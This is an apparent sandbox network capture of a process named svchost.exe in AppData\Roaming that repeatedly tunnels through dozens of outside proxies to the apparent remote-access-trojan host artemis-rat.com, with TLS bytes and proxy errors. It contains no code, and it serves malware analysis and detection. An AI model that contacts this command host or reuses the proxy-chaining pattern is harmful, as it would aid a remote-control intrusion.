                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.422074080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.747006893 CET641INHTTP/1.1 503 Service Unavailable
                                                                                    Access-Control-Allow-Credentials: true
                                                                                    Access-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, Token
                                                                                    Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATE
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Set-Cookie: uuid=94690398-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnly
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Length: 31
                                                                                    Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a
                                                                                    Data Ascii: unsupported protocol scheme ""


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2250192.168.2.557036190.103.177.1318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.425544024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.807657003 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2251192.168.2.557060161.97.163.524572543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.435076952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.177042007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.169274092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.177330017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2252192.168.2.55602345.81.232.173071743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.444154978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.380332947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.254163027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2253192.168.2.557189104.19.233.1178043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.460937023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.615461111 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2254192.168.2.55711780.169.243.234108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.462289095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2255192.168.2.556260162.241.158.2043179443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.472244978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.942717075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146334887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2256192.168.2.557133119.196.168.1838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.478980064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2257192.168.2.55709139.108.227.1088043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.479685068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.118031979 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:30.118395090 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a4 ff c5 b9 88 db 96 b2 0e f6 59 1d 6d 24 1b 78 2f 25 de 93 bf f9 fd 7e f2 f4 8c 83 ef 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRYm$x/%~*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:30.731970072 CET324INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                    Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                    Mar 9, 2024 13:14:30.732007027 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 a6 e1 bd cf 48 a4 1d 40 61 0e 09 0d 7d 4a 93 b1 6f 89 84 60 a1 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eRH@a}Jo`DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:30.732029915 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                    Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                    Mar 9, 2024 13:14:30.732049942 CET412INData Raw: e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3 37 e7 c3 44 a4 7e d8 6c d7 c7 46 f5 92 9b e7 d5 21 be 66 92 19 94 55 6c d4 29 b2 0d c1 66 5b e2 77 49 48 28 ed 9d d7 1a 33 72 53 b3 82 35 cf 62 8b c9 24 8b a5 b7
                                                                                    Data Ascii: =gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( wGI{*BIv;/&ul.8l3x Jo+**4~2-?s1ryq?#W,dUNqFGh&
                                                                                    Mar 9, 2024 13:14:30.732120037 CET1286INData Raw: 05 66 30 82 05 62 30 82 04 4a a0 03 02 01 02 02 10 77 bd 0d 6c db 36 f9 1a ea 21 0f c4 f0 58 d3 0d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 57 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69
                                                                                    Data Ascii: f0b0Jwl6!X0*H0W10UBE10UGlobalSign nv-sa10URoot CA10UGlobalSign Root CA0200619000042Z280128000042Z0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10
                                                                                    Mar 9, 2024 13:14:30.734141111 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 97 ae c7 0d 64 5e 08 ee 21 0e 6e 06 f7 0b 59 1f a5 f2 00 4a f0 6b 43 c9 32 33 80 33 5f e1 71 67 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 88 f3 62 cd 4e 4b d3 aa 18 0b a4 69 5e ff 1e 4c 31 d1 fd 28 db
                                                                                    Data Ascii: %! d^!nYJkC233_qg(bNKi^L1(ZN3@`0{
                                                                                    Mar 9, 2024 13:14:31.362221003 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 46 14 29 d9 60 85 81 d2 07 eb 42 9e c8 b8 d3 d6 65 03 d4 50 8c fa 06 93 a8 2b a6 f4 9c 5e 37 ab 77 97 0f c5 86 95 be 1c 99 6d c2 d4 91 88 bb f3 10 2d a1 9d b1 c1 4f 1c 9a de e7 d6 25 cf ef 4f 1d bb 4b
                                                                                    Data Ascii: F)`BeP+^7wm-O%OKWdW?W NWTqW>p0M,DK}ZBeZ+$Rn3\Ukg6:*?.<(<d-wU@
                                                                                    Mar 9, 2024 13:14:31.363248110 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 1f 1d aa 2e 1f b0 3a c7 9d b7 27 ad e9 a8 64 40 df cd ef 2e 82 86 17 d6 ce da aa 3f 0b 8e 6f 9b fb 11 8f c4 95 6f 6a 88 0d 83 5d 8b 4d a1 2a 40 cc 9a ca d1 96 6a 45 00 46 76 e8 2b 8a 3e 88 06 51 a7 9e 39 86
                                                                                    Data Ascii: .:'d@.?ooj]M*@jEFv+>Q9bPX{bF"uN Ux\y,`.5B8LTbnLCT)uw24-R6A}J2DX[-Gv;9ou[oS1C7Kh\ukfsw"9VR
                                                                                    Mar 9, 2024 13:14:31.981673002 CET112INData Raw: c8 42 1d 8a 87 ca c8 4d 1d 62 6a ca ee f2 c5 a3 a6 d4 24 9d cc bb 28 2b fb e9 d0 ce b4 42 ab 49 78 cd 8e a1 b1 63 c9 d2 54 af 95 7d 3a 67 09 22 ed 0a 05 e1 42 4d b1 09 6d fc b1 3e f4 3b dd d4 3e 1a 1c d7 ec 6f 79 a2 58 6e ee af c7 07 e4 1e 0d 1f
                                                                                    Data Ascii: BMbj$(+BIxcT}:g"BMm>;>oyXneV|x#fbYnQ>m


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2258192.168.2.55572764.227.108.253190843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.479882002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2259192.168.2.557188162.144.36.2082782943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.490017891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.063947916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.624469042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880616903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2260192.168.2.55708145.117.179.1793594243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.491724014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2261192.168.2.55713820.206.106.192812343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.494014978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.816756010 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2262192.168.2.55712662.85.224.217567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.508174896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2263192.168.2.557245172.67.209.128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.509248018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.668093920 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2264192.168.2.557158202.131.65.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.512913942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.177103043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.168977976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.068090916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.880582094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2265192.168.2.55630645.61.188.1344449943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.516833067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2266192.168.2.557144148.72.212.2123390543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.517055988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.333626032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.334148884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.334100962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.333694935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2267192.168.2.557108212.174.242.114808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.521821022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.380353928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.568166971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
